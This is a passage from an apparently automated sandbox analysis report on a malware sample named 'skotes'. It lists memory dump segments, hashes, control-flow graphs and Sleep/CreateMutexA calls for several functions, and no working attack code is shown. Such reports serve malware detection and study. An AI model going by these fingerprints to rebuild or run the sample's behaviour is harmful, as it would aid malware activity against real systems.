                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: b6fed796b9837cd96e9c47eeb041ed96720ea40d7e360b5fad2e0e9d72267b29
                                                                                                                                                                                                                              • Instruction ID: fcb8af244c0d08654f54537992d217c9a217332a01e968c51e8497f785b4102b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6fed796b9837cd96e9c47eeb041ed96720ea40d7e360b5fad2e0e9d72267b29
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A3128316001408BFB08DB78DCC9B6DF7E6EB85318F24429AE414AB3D6EB7999818716
                                                                                                                                                                                                                              Function 00BDA682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 202 bda682-bda6a2 206 bda6a4-bda6b0 202->206 207 bda6d0-bda6ec 202->207 208 bda6c6-bda6cd call bed663 206->208 209 bda6b2-bda6c0 206->209 210 bda6ee-bda6fa 207->210 211 bda71a-bda739 207->211 208->207 209->208 212 bda949 209->212 214 bda6fc-bda70a 210->214 215 bda710-bda717 call bed663 210->215 216 bda73b-bda747 211->216 217 bda767-bda916 call be80c0 211->217 218 bda94e 212->218 219 bda949 call c06c6a 212->219 214->212 214->215 215->211 223 bda75d-bda764 call bed663 216->223 224 bda749-bda757 216->224 228 bda953-bda994 Sleep CreateMutexA 218->228 229 bda94e call c06c6a 218->229 219->218 223->217 224->212 224->223 234 bda9a7-bda9a8 228->234 235 bda996-bda998 228->235 229->228 235->234 236 bda99a-bda9a5 235->236 236->234
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 66593b917aaaaa219ef1d87029a469fa1cedb9992df6a1bf21b24ab59b2223bd
                                                                                                                                                                                                                              • Instruction ID: 50818aea98c917380175d5c5c2bbb196813b1fbb1d9f89c9e52cb380e1da6a92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66593b917aaaaa219ef1d87029a469fa1cedb9992df6a1bf21b24ab59b2223bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5317B31600140CBFB08DB78CCC576DF7F2EB85314F24429AE414A73E5EBB999808752
                                                                                                                                                                                                                              Function 00BD9ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 238 bd9adc-bd9ae8 239 bd9afe-bd9b27 call bed663 238->239 240 bd9aea-bd9af8 238->240 247 bd9b29-bd9b35 239->247 248 bd9b55-bd9b57 239->248 240->239 241 bda917 240->241 244 bda953-bda994 Sleep CreateMutexA 241->244 245 bda917 call c06c6a 241->245 254 bda9a7-bda9a8 244->254 255 bda996-bda998 244->255 245->244 250 bd9b4b-bd9b52 call bed663 247->250 251 bd9b37-bd9b45 247->251 252 bd9b59-bda916 call be80c0 248->252 253 bd9b65-bd9d91 call be7a00 call bd5c10 call bd8b30 call be8220 call be7a00 call bd5c10 call bd8b30 call be8220 248->253 250->248 251->241 251->250 255->254 256 bda99a-bda9a5 255->256 256->254
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 9d42130e9b0769dad22695acada51b1c703fb6d8934b11aca17dc2a8529d62e3
                                                                                                                                                                                                                              • Instruction ID: 7fb3a9eadfc7ace46528467f5af078bb21011dbb6b462b3ce273e601d359a86c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d42130e9b0769dad22695acada51b1c703fb6d8934b11aca17dc2a8529d62e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A2149317042409BFB189F68ECC5B2DF7E1EBC1314F20429AF518973E5EBBA99818711
                                                                                                                                                                                                                              Function 00BDA856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 315 bda856-bda86e 316 bda89c-bda89e 315->316 317 bda870-bda87c 315->317 320 bda8a9-bda8b1 call bd7d30 316->320 321 bda8a0-bda8a7 316->321 318 bda87e-bda88c 317->318 319 bda892-bda899 call bed663 317->319 318->319 322 bda94e 318->322 319->316 332 bda8e4-bda8e6 320->332 333 bda8b3-bda8bb call bd7d30 320->333 324 bda8eb-bda916 call be80c0 321->324 329 bda953-bda987 Sleep CreateMutexA 322->329 330 bda94e call c06c6a 322->330 335 bda98e-bda994 329->335 330->329 332->324 333->332 340 bda8bd-bda8c5 call bd7d30 333->340 337 bda9a7-bda9a8 335->337 338 bda996-bda998 335->338 338->337 339 bda99a-bda9a5 338->339 339->337 340->332 344 bda8c7-bda8cf call bd7d30 340->344 344->332 347 bda8d1-bda8d9 call bd7d30 344->347 347->332 350 bda8db-bda8e2 347->350 350->324
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 64fdee32e408dce0b9dbd81a397ada9a1680550fb1637a56c7ab4b447d3f143f
                                                                                                                                                                                                                              • Instruction ID: 6907f2b41cf5ff409900364e5f457c558d954080bcb27266593eff9f45e3fbe7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64fdee32e408dce0b9dbd81a397ada9a1680550fb1637a56c7ab4b447d3f143f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5210A712452419BFB2467689C9676DF2D2DF81700F2408E7F904963D2FFBB9A819293
                                                                                                                                                                                                                              Function 00BDA34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 292 bda34f-bda35b 293 bda35d-bda36b 292->293 294 bda371-bda39a call bed663 292->294 293->294 295 bda93a 293->295 300 bda39c-bda3a8 294->300 301 bda3c8-bda916 call be80c0 294->301 297 bda953-bda994 Sleep CreateMutexA 295->297 298 bda93a call c06c6a 295->298 308 bda9a7-bda9a8 297->308 309 bda996-bda998 297->309 298->297 303 bda3be-bda3c5 call bed663 300->303 304 bda3aa-bda3b8 300->304 303->301 304->295 304->303 309->308 311 bda99a-bda9a5 309->311 311->308
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
